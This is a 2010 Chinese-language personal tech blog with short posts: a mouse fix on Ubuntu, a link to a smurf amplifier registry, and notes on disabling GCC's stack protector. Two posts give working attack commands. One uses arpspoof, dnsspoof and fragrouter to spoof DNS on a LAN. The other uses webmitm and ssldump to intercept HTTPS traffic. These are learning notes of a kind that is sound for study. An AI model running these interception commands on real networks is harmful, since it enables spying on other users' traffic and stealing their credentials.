http://www.powertech.no/smurf/ - Smurf Amplifier Registry: "- Sent using Google Toolbar"
專門搜尋Internet有無smurf amplifier,約每30秒都會更新一次噢。
星期日, 5月 23, 2010
星期日, 5月 16, 2010
Ubuntu One on Aspire One can't scroll mouse
as title, 所以找了方法。
紀錄一下日後可用。
如果可以的話,就把
ref:Link
紀錄一下日後可用。
sudo modprobe -r psmouse sudo modprobe psmouse proto=imps
如果可以的話,就把
options psmouse proto=imps加到/etc/modprobe.d/options裡面,done.
ref:Link
星期日, 5月 02, 2010
HTTPS and SSL sniffing
延續上篇
可以spoofing dns以後,把有https的web site改到somehost
在somehost上,跑webmitm
webmitm會自行產生Certificate(沒有CA簽證,當然。)
webmitm會扮演好http & https proxy的角色
最後,在用ssldump -k webmitm.crt -d | grep pattern
就會過濾出....
這類攻擊的防線在於client要沒有認證的憑證網站就不要相信,
也就是瀏覽器在出現憑證沒有可信任的CA簽署時候,就不要繼續做傻事了
可以spoofing dns以後,把有https的web site改到somehost
在somehost上,跑webmitm
webmitm會自行產生Certificate(沒有CA簽證,當然。)
webmitm會扮演好http & https proxy的角色
最後,在用ssldump -k webmitm.crt -d | grep pattern
就會過濾出....
這類攻擊的防線在於client要沒有認證的憑證網站就不要相信,
也就是瀏覽器在出現憑證沒有可信任的CA簽署時候,就不要繼續做傻事了
標籤:
Security
星期六, 5月 01, 2010
DNS Spoofing
用了幾項工具來完成。
1.dnsspoof
2.arpspoof
3.fragrouter
過程如下
1.設定好IP forwarding
2.接收LAN的封包
3.將要改的dns放到dnsspoof.host檔案以後
OK.
1.dnsspoof
2.arpspoof
3.fragrouter
過程如下
1.設定好IP forwarding
#fragrouter -i eth0 -B1
2.接收LAN的封包
#arpspoof [spoof ip]通常spoof的ip為LAN的router
3.將要改的dns放到dnsspoof.host檔案以後
#dnsspoof -f ./dnsspoof.host
OK.
星期六, 4月 10, 2010
Smash Stack Disable
-fstack-protector Ubuntu下的GCC compile時預設啟動了此參數,如果想要測試一些stack overflow的程式會出現問題如下:
解決方法就是在compile時加上-fno-stack-protector就可以了。
*** stack smashing detected ***: ./a.out terminated ======= Backtrace: ========= /lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f5b6d8] /lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb7f5b690] ./a.out[0x80484cf] [0x78787878] ======= Memory map: ======== 08048000-08049000 r-xp 00000000 08:01 5620003 /home/cacaegg/src/a.out 08049000-0804a000 r--p 00000000 08:01 5620003 /home/cacaegg/src/a.out 0804a000-0804b000 rw-p 00001000 08:01 5620003 /home/cacaegg/src/a.out
解決方法就是在compile時加上-fno-stack-protector就可以了。
訂閱:
文章 (Atom)